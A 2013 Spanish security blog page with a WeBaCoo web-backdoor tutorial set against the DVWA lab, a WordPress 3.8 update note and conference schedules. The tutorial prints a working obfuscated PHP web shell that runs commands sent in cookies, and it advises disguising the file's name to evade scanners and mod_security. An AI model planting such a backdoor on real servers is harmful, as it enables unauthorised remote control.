17 de diciembre de 2013

Como crear un Backdoor con WeBaCoo (2 de 2)


Segunda y última parte de esta entrega, y la idea de hoy es en primer lugar crear nuestro backdoor con WeBaCoo y lograr comprometer un servidor, para evitar meternos en problemas vamos a utilizar DVWA y en particular su fallo en el menu de Upload.

Para evitar llamar la atención en los escaneadores de archivos e incluso en el mismo mod_security, les recomiendo que utilicen un nombre para su backdoor que no haga alusión a que es un backdoor sino un archivo más.

$ ./webacoo.pl -g -f 1 -o consulta.php

        WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
        Copyright (C) 2011-2012 Anestis Bechtsoudis
        { @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }

[+] Backdoor file "consulta.php" created.

Por defecto el código queda ofuscado, pero tenemos la opción con -r de no ofuscarlo al momento de generarlo.

$ cat consulta.php
<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>

16 de diciembre de 2013

Actualización WordPress 3.8


Por estos últimos días, se liberó una nueva actualización del CMS más popular de la web, WordPress 3.8 “Parker”, la misma incorpora todas las actualizaciones anteriores como la 3.7 y 3.7.1

Todas las mejoras para esta nueva versión son a nivel de experiencia de usuario y hasta el momento no se dio detalle sobre fallos de seguridad, es posible en el correr de los días se publiquen algunos documentos al respecto.

La verdad que estuve trabajando todo el fin de semana con esta nueva versión, donde le da un giro 360º al panel de administración, nuevos estilos, responsive designer, nueva administración de themes y varias cosas más que estoy seguro que van a percibir aquellos usuarios que vienen trabajando con WordPress.



Por otro lado #WPHardening es totalmente compatible con WordPress 3.8 así que les recomiendo implementarlo para cerrar y fortificar su proyecto antes de enviarlo a producción o subirlo al web hosting.

Desde ya es recomendable actualizar a esta nueva versión por posibles problemas de seguridad futuros y además para tener y disfrutar de esta nueva versión 100% libre.

Saludos!

Enlace | WordPress 3.8

13 de diciembre de 2013

A&D Security Conference 2013 - Día 2 en Vivo


Live streaming video by Ustream

09:00 AM

Registración

09:30 AM

Bienvenida

09:40 AM

La Ética del Hacker Valentin Muro

10:00 AM

Auditorio 1 - Conociendo Huemul distro para informatica Forense Marcos Russo/Vampii/Gonzalo Zaccardi
Aula 1 - OpenTalks
Aula 2 - OpenTalks

10:45 AM

Auditorio 1 - Pivoting in Amazon clouds Andres Riancho
Aula 1 - OpenTalks
Aula 2 - OpenTalks

11:30 AM

Break

11:45 AM

Auditorio 1 - Uso de la Ingeniería Inversa de código en la detección de vulnerabilidades Eugenia Bahit
Aula 1 - TULZ - w3af Andres Riancho
Aula 2 - TULZ - PC táctil Daniel Dieser

12:30 PM 

Auditorio 1 - Brazilian cybercrime underground: Modus Operandi Ronaldo Lima/Aline Bueno
Aula 1 - TULZ - Secure TDD Carlos Pantelides
Aula 2 - TULZ - vScan Federico Massa

13:15 PM 

Almuerzo

14:30 PM 

Auditorio 1 - Hacking RFID Babak Javadi
Aula 1 - OpenTalks
Aula 2 - OpenTalks

15:15 PM 

Auditorio 1 - Temas avanzados de Rootkits Marcos Schejtman
Aula 1 - OpenTalks
Aula 2 - OpenTalks

16:00 PM 

Break

16:15 PM 

Hackers University: Out of The Matrix Fede Pacheco

16:45 PM 

Desde Dig a la Destrucción de RSA Cristian Amicelli

17:45 PM 

Cierre / Sorteos / Show

18:30 PM 

Fin Día 2

12 de diciembre de 2013

A&D Security Conference 2013 - Día 1 en Vivo

Live streaming video by Ustream

09:00 AM

Registración

09:45 AM

Bienvenida

10:00 AM

Los límites éticos y legales que no podés cruzar en una investigación, o sí Sebastian Bortnik

10:30 AM

Hacking Router's with FeeeBSD Alexis Sarghel / Diego Gutierrez

11:15 AM

Openpgp y HTTP: Alta fiesta? Buanzo 

12:00 AM

Break

12:15 PM 

Auditorio 1 - Workshop Fail2ban Buanzo
Auditorio 2 - Workshop Cryptography 101 Paulo Veloso

13:15 PM 

Almuerzo

14:30 PM 

Auditorio 1 - Workshop Lockpicking Babak Javadi
Auditorio 2 - Workshop Your brain, my treasure... Michael Hudson

15:30 PM 

Break

15:45 PM 

Life as a Cracker, mitos y verdades Alberto Ferrer / David de Asis

16:30 PM 

The CSO Myopia Jordan Bonagura

17:15 PM 

Facebook Hacking Tool Gustavo Ogawa

18:15 PM 

Cierre

18:30 PM 

Fin Día 1

Entradas populares